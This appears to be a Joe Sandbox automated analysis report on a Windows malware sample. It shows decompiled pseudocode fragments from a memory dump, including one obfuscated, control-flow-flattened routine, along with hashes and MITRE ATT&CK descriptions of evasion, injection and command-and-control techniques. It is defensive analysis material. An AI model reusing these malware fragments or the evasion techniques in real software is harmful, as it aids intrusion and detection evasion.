Part of subcall function 0045320C: CloseHandle.KERNEL32(FFFFFFFE,004531CB,?,004513FA,00000000,00000001,00000000,?,?,00448007,?,0044CA66,00000000,?,?), ref: 0045321C

___initconout.LIBCMT ref: 004531CB

Part of subcall function 004531ED: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00453189,004513E7,?,?,00448007,?,0044CA66,00000000,?), ref: 00453200

WriteConsoleW.KERNEL32(00000000,0044CA66,00000000,00000000,?,004513FA,00000000,00000001,00000000,?,?,00448007,?,0044CA66,00000000,?), ref: 004531E0

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9c3960d76ae8f39cf2c3e636f67fb160af93673dd2c1cc67e9fcd835dd056000
Instruction ID: c9b76fc0aab39f6a00c5ecd55789368322583b39dc8d3cb630d80356313b7d6c
Opcode Fuzzy Hash: 9c3960d76ae8f39cf2c3e636f67fb160af93673dd2c1cc67e9fcd835dd056000
Instruction Fuzzy Hash: 7FF0FE36910518BBCF221F969C0599A3F66EF457E6F004021FD1885121DA72CA24AB99

Uniqueness

Uniqueness Score: -1.00%

Function 00432010 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00432010(void* __ecx, intOrPtr __edx, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				signed char _v36;
				signed int _v40;
				void* __ebx;
				void* __edi;
				signed int _t64;
				signed int _t71;
				intOrPtr _t72;
				void* _t73;
				intOrPtr* _t74;
				intOrPtr _t76;
				signed int _t78;
				signed int _t79;
				signed int _t85;
				intOrPtr* _t89;
				intOrPtr _t90;
				signed char _t94;
				signed int _t104;
				char _t106;
				signed char _t110;
				signed int _t113;
				signed char _t118;
				unsigned int _t119;
				signed char _t121;
				signed char _t123;
				signed int _t130;
				void* _t131;
				intOrPtr _t132;
				intOrPtr _t144;
				signed int _t146;
				void* _t150;
				void* _t152;
				void* _t159;

				_t127 = __edx;
				_t89 = _a4;
				_push(_t131);
				_v5 = 0;
				_v16 = 1;
				 *_t89 = E00454AE1(__ecx,  *_t89);
				_t90 = _a8;
				_t6 = _t90 + 0x10; // 0x11
				_t144 = _t6;
				_push(_t144);
				_v20 = _t144;
				_v12 =  *(_t90 + 8) ^  *0x460120;
				E00431FD0(_t90, __edx, _t131, _t144,  *(_t90 + 8) ^  *0x460120);
				E00443E03(_a12);
				_t64 = _a4;
				_t152 = _t150 - 0x1c + 0x10;
				_t132 =  *((intOrPtr*)(_t90 + 0xc));
				if(( *(_t64 + 4) & 0x00000066) != 0) {
					__eflags = _t132 - 0xfffffffe;
					if(_t132 != 0xfffffffe) {
						_t127 = 0xfffffffe;
						E004440E0(_t90, 0xfffffffe, _t144, 0x460120);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t64;
					_v28 = _a12;
					 *((intOrPtr*)(_t90 - 4)) =  &_v32;
					if(_t132 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t104 = _v12;
							_t71 = _t132 + (_t132 + 2) * 2;
							_t90 =  *((intOrPtr*)(_t104 + _t71 * 4));
							_t72 = _t104 + _t71 * 4;
							_t105 =  *((intOrPtr*)(_t72 + 4));
							_v24 = _t72;
							if( *((intOrPtr*)(_t72 + 4)) == 0) {
								_t106 = _v5;
								goto L7;
							} else {
								_t127 = _t144;
								_t73 = E00444080(_t105, _t144);
								_t106 = 1;
								_v5 = 1;
								_t159 = _t73;
								if(_t159 < 0) {
									_v16 = 0;
									L13:
									_push(_t144);
									E00431FD0(_t90, _t127, _t132, _t144, _v12);
									goto L14;
								} else {
									if(_t159 > 0) {
										_t74 = _a4;
										__eflags =  *_t74 - 0xe06d7363;
										if( *_t74 == 0xe06d7363) {
											__eflags =  *0x457ca8;
											if(__eflags != 0) {
												_t85 = E00443ED0(__eflags, 0x457ca8);
												_t152 = _t152 + 4;
												__eflags = _t85;
												if(_t85 != 0) {
													_t146 =  *0x457ca8; // 0x431d88
													 *0x45d9f4(_a4, 1);
													 *_t146();
													_t144 = _v20;
													_t152 = _t152 + 8;
												}
												_t74 = _a4;
											}
										}
										_t128 = _t74;
										E004440C0(_t74, _a8, _t74);
										_t76 = _a8;
										__eflags =  *((intOrPtr*)(_t76 + 0xc)) - _t132;
										if( *((intOrPtr*)(_t76 + 0xc)) != _t132) {
											_t128 = _t132;
											E004440E0(_t76, _t132, _t144, 0x460120);
											_t76 = _a8;
										}
										_push(_t144);
										 *((intOrPtr*)(_t76 + 0xc)) = _t90;
										E00431FD0(_t90, _t128, _t132, _t144, _v12);
										E004440A0();
										asm("int3");
										asm("int3");
										asm("int3");
										_t78 = _v32;
										_push(_t90);
										__eflags = _t78;
										if(_t78 == 0) {
											L34:
											return _t78;
										} else {
											_t130 = _v40;
											_t94 = _v36;
											__eflags = _t130 & 0x00000003;
											if((_t130 & 0x00000003) == 0) {
												L28:
												_t79 = _t78 - 4;
												__eflags = _t79;
												if(_t79 < 0) {
													L31:
													_t78 = _t79 + 4;
													__eflags = _t78;
													if(_t78 == 0) {
														goto L34;
													} else {
														while(1) {
															_t110 =  *_t130;
															_t130 = _t130 + 1;
															__eflags = _t110 ^ _t94;
															if((_t110 ^ _t94) == 0) {
																goto L43;
															}
															_t78 = _t78 - 1;
															__eflags = _t78;
															if(_t78 != 0) {
																continue;
															} else {
																goto L34;
															}
															goto L47;
														}
														goto L43;
													}
												} else {
													_push(_t132);
													_t94 = ((_t94 << 8) + _t94 << 0x10) + (_t94 << 8) + _t94;
													do {
														_t113 =  *_t130 ^ _t94;
														_t130 = _t130 + 4;
														__eflags = (_t113 ^ 0xffffffff ^ 0x7efefeff + _t113) & 0x81010100;
														if(((_t113 ^ 0xffffffff ^ 0x7efefeff + _t113) & 0x81010100) == 0) {
															goto L35;
														} else {
															_t118 =  *(_t130 - 4) ^ _t94;
															__eflags = _t118;
															if(_t118 == 0) {
																return _t130 - 4;
															} else {
																_t119 = _t118 ^ _t94;
																__eflags = _t119;
																if(_t119 == 0) {
																	return _t130 - 3;
																} else {
																	_t121 = _t119 >> 0x00000010 ^ _t94;
																	__eflags = _t121;
																	if(_t121 == 0) {
																		return _t130 - 2;
																	} else {
																		__eflags = _t121 ^ _t94;
																		if((_t121 ^ _t94) == 0) {
																			goto L43;
																		} else {
																			goto L35;
																		}
																	}
																}
															}
														}
														goto L47;
														L35:
														_t79 = _t79 - 4;
														__eflags = _t79;
													} while (_t79 >= 0);
													goto L31;
												}
											} else {
												while(1) {
													_t123 =  *_t130;
													_t130 = _t130 + 1;
													__eflags = _t123 ^ _t94;
													if((_t123 ^ _t94) == 0) {
														break;
													}
													_t78 = _t78 - 1;
													__eflags = _t78;
													if(_t78 == 0) {
														goto L34;
													} else {
														__eflags = _t130 & 0x00000003;
														if((_t130 & 0x00000003) != 0) {
															continue;
														} else {
															goto L28;
														}
													}
													goto L47;
												}
												L43:
												return _t130 - 1;
											}
										}
									} else {
										goto L7;
									}
								}
							}
							goto L47;
							L7:
							_t132 = _t90;
						} while (_t90 != 0xfffffffe);
						if(_t106 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L47:
			}

0x00432010
0x00432017
0x0043201b
0x0043201c
0x00432022
0x0043202e
0x00432030
0x00432036
0x00432036
0x0043203f
0x00432041
0x00432044
0x00432047
0x0043204f
0x00432054
0x00432057
0x0043205a
0x00432061
0x004320bd
0x004320c0
0x004320c8
0x004320cf
0x00000000
0x004320cf
0x00000000
0x00432063
0x00432063
0x00432069
0x0043206f
0x00432075
0x004320e0
0x004320e9
0x00432077
0x00432077
0x00432077
0x0043207d
0x00432080
0x00432083
0x00432086
0x00432089
0x0043208e
0x004320a4
0x00000000
0x00432090
0x00432090
0x00432092
0x00432097
0x00432099
0x0043209c
0x0043209e
0x004320b4
0x004320d4
0x004320d4
0x004320d8
0x00000000
0x004320a0
0x004320a0
0x004320ea
0x004320ed
0x004320f3
0x004320f5
0x004320fc
0x00432103
0x00432108
0x0043210b
0x0043210d
0x0043210f
0x0043211c
0x00432122
0x00432124
0x00432127
0x00432127
0x0043212a
0x0043212a
0x004320fc
0x00432130
0x00432132
0x00432137
0x0043213a
0x0043213d
0x00432145
0x00432149
0x0043214e
0x0043214e
0x00432151
0x00432155
0x00432158
0x00432168
0x0043216d
0x0043216e
0x0043216f
0x00432170
0x00432174
0x00432175
0x00432177
0x004321cb
0x004321cc
0x00432179
0x00432179
0x0043217f
0x00432183
0x00432189
0x004321a1
0x004321a1
0x004321a1
0x004321a4
0x004321b8
0x004321b8
0x004321b8
0x004321bb
0x00000000
0x004321bd
0x004321bd
0x004321bd
0x004321bf
0x004321c2
0x004321c4
0x00000000
0x00000000
0x004321c6
0x004321c6
0x004321c9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004321c9
0x00000000
0x004321bd
0x004321a6
0x004321a6
0x004321b3
0x004321d2
0x004321d4
0x004321e2
0x004321e5
0x004321eb
0x00000000
0x004321ed
0x004321f0
0x004321f0
0x004321f2
0x0043221c
0x004321f4
0x004321f4
0x004321f4
0x004321f6
0x00432216
0x004321f8
0x004321fb
0x004321fb
0x004321fd
0x00432210
0x004321ff
0x004321ff
0x00432201
0x00000000
0x00432203
0x00000000
0x00432203
0x00432201
0x004321fd
0x004321f6
0x004321f2
0x00000000
0x004321cd
0x004321cd
0x004321cd
0x004321cd
0x00000000
0x004321b7
0x0043218b
0x0043218b
0x0043218b
0x0043218d
0x00432190
0x00432192
0x00000000
0x00000000
0x00432194
0x00432194
0x00432197
0x00000000
0x00432199
0x00432199
0x0043219f
0x00000000
0x00000000
0x00000000
0x00000000
0x0043219f
0x00000000
0x00432197
0x00432206
0x0043220a
0x0043220a
0x00432189
0x004320a2
0x00000000
0x004320a2
0x004320a0
0x0043209e
0x00000000
0x004320a7
0x004320a7
0x004320a9
0x004320b0
0x00000000
0x004320b2
0x00000000
0x004320b0
0x00432075
0x00000000

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0043204F
__IsNonwritableInCurrentImage.LIBCMT ref: 00432103

Strings

csm, xrefs: 004320ED

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 8535e853eed816dfa845400de059f3149f55cebde45149b6218107309ed80a58
Instruction ID: 169a9b8db1f25077250931baceeabc80c86663ce598ec32c6ded89572d239ec0
Opcode Fuzzy Hash: 8535e853eed816dfa845400de059f3149f55cebde45149b6218107309ed80a58
Instruction Fuzzy Hash: 9E412834A002089BCF14DF69C940B9FBBB1EF48324F14815BEA145B392D779EA55CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00425814 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 105
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00425814(void* __edx, WCHAR* _a4) {
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				intOrPtr _t15;
				WCHAR* _t18;
				WCHAR* _t20;
				signed int _t23;
				void* _t30;
				unsigned int _t31;
				WCHAR* _t38;
				signed int* _t39;

				_t30 = __edx;
				_t39 =  &_v20;
				_t38 = _a4;
				_v24 = 0x204b3ed8;
				_t15 = 0x204b3ed8;
				_t31 = _v16;
				L1:
				while(_t15 > 0x204b3ed7) {
					__eflags = _t15 - 0x5577d6d3;
					if(_t15 > 0x5577d6d3) {
						__eflags = _t15 - 0x5577d6d4;
						if(_t15 == 0x5577d6d4) {
							_t31 = ((_t31 + 0xffffffa1 >> 2) + 0x2d >> 0xb) + 0x76;
							_push(_t31);
							_push(0x3e64);
							_push(0x6ff);
							E00426021(_t30);
							_t39 =  &(_t39[3]);
							_t15 = 0xe88c259a;
							__eflags = _t31 - 0xd4;
							if(_t31 == 0xd4) {
								continue;
							}
							L21:
							_t15 = 0xca7d9612;
							continue;
						}
						__eflags = _t15 - 0x709e7a25;
						if(_t15 != 0x709e7a25) {
							continue;
						}
						_t31 = (_t31 >> 2) + 0xffffff18 >> 0x16;
						E00425DFA(0x57aa, _t31);
						_t39 =  &(_t39[2]);
						_t15 = 0x5577d6d4;
						__eflags = _t31 - 0x45;
						if(_t31 == 0x45) {
							continue;
						}
						goto L21;
					}
					__eflags = _t15 - 0x204b3ed8;
					if(_t15 == 0x204b3ed8) {
						_push(2);
						_push(0x104);
						_t18 = E0043EBC9();
						_t39 =  &(_t39[2]);
						_v32 = _t18;
						_t15 = 0x17dbd9f7;
						continue;
					}
					__eflags = _t15 - 0x359a4a84;
					if(_t15 == 0x359a4a84) {
						goto L21;
					}
				}
				if(_t15 > 0xe88c2599) {
					__eflags = _t15 - 0xe88c259a;
					if(_t15 == 0xe88c259a) {
						lstrcatW(_v32, _t38);
						_t20 = E0041F94C(L"ec48478eb02322f7d86623ec");
						_t39 =  &(_t39[1]);
						_v28 = _t20;
						_t15 = 0x359a4a84;
					} else {
						__eflags = _t15 - 0x17dbd9f7;
						if(_t15 == 0x17dbd9f7) {
							_t15 = 0xe88c259a;
						}
					}
					goto L1;
				}
				if(_t15 == 0xca7d9612) {
					lstrcatW(_v32, _v28);
					_t15 = 0xe3a20264;
					goto L1;
				}
				if(_t15 != 0xe3a20264) {
					__eflags = _t15 - 0xd7df6f29;
					if(__eflags != 0) {
						goto L1;
					}
					_v24 = _t15;
					_v16 = _t31;
					E0043F602(_v28);
					_t23 = E0040AACC(_t30, __eflags, _v32);
					__eflags = _t23;
					_t14 = _t23 != 0;
					__eflags = _t14;
					return 0 | _t14;
				} else {
					_v20 = 0xffffd9c2 + _v20 * 0x160;
					_t15 = 0xd7df6f29;
					goto L1;
				}
			}

0x00425814
0x00425817
0x0042581a
0x0042581e
0x00425826
0x0042582b
0x00000000
0x00425835
0x00425871
0x00425876
0x004258a1
0x004258a6
0x0042593e
0x00425941
0x00425942
0x00425947
0x0042594c
0x00425951
0x00425954
0x00425959
0x0042595f
0x00000000
0x00000000
0x00425965
0x00425965
0x00000000
0x00425965
0x004258ac
0x004258b1
0x00000000
0x00000000
0x004258bc
0x004258c5
0x004258ca
0x004258cd
0x004258d2
0x004258d5
0x00000000
0x00000000
0x00000000
0x004258db
0x00425878
0x0042587d
0x004258f4
0x004258f6
0x004258fb
0x00425900
0x00425903
0x00425906
0x00000000
0x00425906
0x0042587f
0x00425884
0x00000000
0x00000000
0x0042588a
0x00425841
0x0042588c
0x00425891
0x00425915
0x0042591c
0x00425921
0x00425924
0x00425928
0x00425893
0x00425893
0x00425898
0x0042589a
0x0042589a
0x00425898
0x00000000
0x00425891
0x00425848
0x004258e8
0x004258ea
0x00000000
0x004258ea
0x00425853
0x0042596f
0x00425974
0x00000000
0x00000000
0x0042597a
0x0042597e
0x00425986
0x00425991
0x0042599b
0x0042599d
0x0042599d
0x004259a8
0x00425859
0x00425866
0x0042586a
0x00000000
0x0042586a

APIs

lstrcatW.KERNEL32(?,?), ref: 004258E8
lstrcatW.KERNEL32(?,?), ref: 00425915

Strings

ec48478eb02322f7d86623ec, xrefs: 00425917

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: lstrcat
String ID: ec48478eb02322f7d86623ec
API String ID: 4038537762-1363470560
Opcode ID: e9220eb19284f11be8dacb0c78e107cc09ce5c287ab4ba53a0d76cfb77ec1707
Instruction ID: 2ad2baf4515dee9ec5ebd8f15be326c5e014077fa0d9f999f1a5ea30d65141cc
Opcode Fuzzy Hash: e9220eb19284f11be8dacb0c78e107cc09ce5c287ab4ba53a0d76cfb77ec1707
Instruction Fuzzy Hash: B83128A2F04A50E7CA34795ABC8641FA7A06B94350FE4842BF449D3390D2BCCCA4D71B

Uniqueness

Uniqueness Score: -1.00%

Function 00450ABF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 40%

			E00450ABF(void* __edx, signed int _a4, signed int _a8, intOrPtr _a12, signed int* _a20, signed int _a24, signed char _a28) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t37;
				void* _t40;
				signed int _t45;
				void* _t51;
				void* _t54;
				signed int* _t55;
				void* _t58;
				void* _t59;
				void* _t62;
				intOrPtr* _t65;

				_pop(_t66);
				_push(_t51);
				_push(_t62);
				E00443E03(_a12);
				_t54 = _t59;
				_t37 = E00443C86(_t51, _t54, __edx, _t59, _t62);
				_t55 = _a20;
				_t58 = _a4;
				if( *((intOrPtr*)(_t37 + 0x20)) != 0 ||  *_t58 == 0xe06d7363 ||  *_t58 == 0x80000026 || ( *_t55 & 0x1fffffff) < 0x19930522 || (_t55[8] & 0x00000001) == 0) {
					if(( *(_t58 + 4) & 0x00000066) == 0) {
						if(_t55[3] != 0) {
							L15:
							if( *_t58 != 0xe06d7363 ||  *((intOrPtr*)(_t58 + 0x10)) < 3 ||  *((intOrPtr*)(_t58 + 0x14)) <= 0x19930522) {
								L20:
								E00450E2F(_t58, _t58, _a4, _a8, _a12, _t55, _a28, _a20, _a24);
								goto L21;
							} else {
								_t65 =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0x1c)) + 8));
								if(_t65 == 0) {
									goto L20;
								} else {
									 *0x45d9f4(_t58, _a4, _a8, _a12, _t55, _a20, _a24, _a28 & 0x000000ff);
									_t40 =  *_t65();
								}
							}
						} else {
							_t45 =  *_t55 & 0x1fffffff;
							if(_t45 < 0x19930521 || _t55[7] == 0) {
								if(_t45 < 0x19930522 || (_t55[8] >> 0x00000002 & 0x00000001) == 0) {
									goto L21;
								} else {
									goto L15;
								}
							} else {
								goto L15;
							}
						}
					} else {
						if(_t55[1] != 0 && _a20 == 0) {
							E00450691(_a4, _a12, _t55);
						}
						goto L21;
					}
				} else {
					L21:
					_t40 = 1;
				}
				return _t40;
			}

0x00450ac2
0x00450d30
0x00450d31
0x00450d36
0x00450d3b
0x00450d3c
0x00450d41
0x00450d46
0x00450d56
0x00450d7e
0x00450da9
0x00450dc9
0x00450dcf
0x00450e0b
0x00450e1f
0x00000000
0x00450ddc
0x00450ddf
0x00450de4
0x00000000
0x00450de6
0x00450dfe
0x00450e04
0x00450e06
0x00450de4
0x00450dab
0x00450dad
0x00450db4
0x00450dbd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00450db4
0x00450d80
0x00450d83
0x00450d99
0x00450d9e
0x00000000
0x00450d83
0x00450e27
0x00450e27
0x00450e29
0x00450e29
0x00450e2e

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00450D36

Strings

csm, xrefs: 00450D58
csm, xrefs: 00450DC9

Memory Dump Source

Source File: 00000001.00000002.252725900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegSvcs.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 11cd8d28888086f37ee62250d5e531b905c03e2c3bda449a1fa7636840c4b0fa
Instruction ID: 3e43a8d2e1f41c59e2d9d7f0fd91172f76eb7c7ceae668a21a877a70e7d79d1e
Opcode Fuzzy Hash: 11cd8d28888086f37ee62250d5e531b905c03e2c3bda449a1fa7636840c4b0fa
Instruction Fuzzy Hash: 0C31E47A40021ADBCF264F90C94596F7B65FF09317B28495BFC4409212C33ADD6ADBC9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FT0uDS8neB.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs
